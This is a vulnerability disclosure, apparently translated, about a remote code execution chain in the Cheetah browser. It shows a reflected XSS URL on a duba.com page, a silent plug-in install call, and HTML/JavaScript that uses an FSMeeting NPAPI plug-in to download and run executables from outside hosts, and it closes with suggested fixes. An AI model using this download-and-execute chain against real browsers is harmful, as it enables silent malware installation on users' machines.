Remote code execution in the cheetah Browser

Remote code execution in the cheetah Browser

1. download the latest version of the cheetah Browser: KSbrowser_5.2.85.9616.exe

2. Through analysis and observation of some User-Defined Function interfaces implemented by the cheetah (Some APIs under external), I found that Jinshan has the following APIs:

External. NativeInstallExtensions (["fpmcdbknonpdbngoboglidihcbfjcaep"]);

Fpmcdbknonpdbngoboglidihcbfjcaep is the Application ID in the cheetah browser market.

First, all websites under liebao.cn or duba.com have the permission to call this function, this function can be used to silently install any plug-in the application market (that is, there is no interaction prompt for installing the plug-in ).

3. How can I use this api for silent plug-in installation? I can probably think of the following situations:

A. Compile A malicious function plug-in and upload it to the application market (subject to official review)

B. Find a plug-in with functional defects that can be exploited for Silent Installation. This can be divided into two situations:

B1. the plug-in page has XSS, but since CSP (content_security_policy) is usually enabled on the plug-in page, it is difficult to exploit this problem. Even if XSS exists, it is necessary to execute commands, it is also relatively difficult.

B2. another scenario that can be used is that the internal package of the plug-in contains the npapi and its public attribute is set to true, so that we only need to silently install the plug-in, any page can call the interfaces provided by this npapi. As long as the functions provided by this npapi have security defects, further security problems can be caused.

4. Based on the above analysis, we went to the cheetah application market to screen some plug-ins. We are more concerned with some words: "download, start" and so on. Finally, we can find the following applications:
 

5. After installing this plug-in, we found that the plug-in will contain a dll file and the public attribute of this plug-in is true, which can be called on any page.
 

However, we do not know the specific usage of this dll.
 

6. I searched for the official FSMeeting website and demo. After opening the official demo site, I waited for a while! I found that my computer was automatically installed with the "havip" software .. The plug-in has a silent installation function, so I checked the source code and found the code in it.
 

7. It is not difficult to see that the run2 function is a download and execution api, and it is not difficult to write the following code.

<embed  pluginspage='http://www.fsmeeting.com/download/fmloader.xpi' id='fx_ClientLoader' type='application/npcltloader-plugin' hidden='true' width='1' height='1'/><script>var NodeManAddr="TCP:fsmeeting.com:1089;";var userType="0";var GroupName="Fastonz";var ProductName="FMDesktop";var ClientName="FMDesktop";var room_para="-link"+" " + NodeManAddr +  " "+"-rid"+" "+'' + " " + "-uname" + " "+''+" "+"-utype"+" "+userType;var downloadurl="http://x.com/testbaidu.exe";window.onload=function(){document.getElementById("fx_ClientLoader").Run2(downloadurl,GroupName,ProductName,room_para);}</script>

This code can be executed simultaneously from x.com/testbaidu.exe.
 

8. We can see from the previous figure that the page on which the public plug-in is called can be called. In this way, the command execution logic is ready.


Use an xsstool under liebao.cn/duba.comto call external.nativeinstallextensions (["fpmcdbknonpdbngoboglidihcbfjcaep"]); install a browser plug-in for visual access.



Then, create an htm page and call the hav plug-in function to download and execute the remote exe.

---------------------------------------------------------------------


XSS is as follows:

http://tuan.duba.com/category/?city_code=\u0022\u003e\u003cimg%20src=1%20onerror=alert\u00281\u0029\u003e&cateid=4&f=qrj2015

Use XSS to call the following to install the havip plug-in. After installation, you will be redirected to liebao1.htm.
 

external.NativeInstallExtensions(["fpmcdbknonpdbngoboglidihcbfjcaep"]);setTimeout(function(){location.href="http://xsst.sinaapp.com/poc/liebao1.htm";},1500);

The http://xsst.sinaapp.com/poc/liebao1.htm code is downloaded and executed as follows:
 

<embed  pluginspage='http://www.fsmeeting.com/download/fmloader.xpi' id='fx_ClientLoader' type='application/npcltloader-plugin' hidden='true' width='1' height='1'/><script>var NodeManAddr="TCP:fsmeeting.com:1089;";var userType="0";var GroupName="Fastonz";var ProductName="FMDesktop";var ClientName="FMDesktop";var room_para="-link"+" " + NodeManAddr +  " "+"-rid"+" "+'' + " " + "-uname" + " "+''+" "+"-utype"+" "+userType;var downloadurl="http://xsst.sinaapp.com/poc/calc.exe";window.onload=function(){document.getElementById("fx_ClientLoader").Run2(downloadurl,GroupName,ProductName,room_para);}</script>

 

1. win7 (enable or disable UAC can be) Access http://xsst.sinaapp.com/poc/liebao2.htm


This page will jump to the XSS and install "havip"


2. After the installation, go to http://xsst.sinaapp.com/poc/liebao1.htmin 1.5 seconds to download and execute the command, as shown below:

 

 

Solution:

1. Modify the Silent Installation function and take some interactive prompts.

2. Perform more rigorous reviews on applications that include npapi in the application market.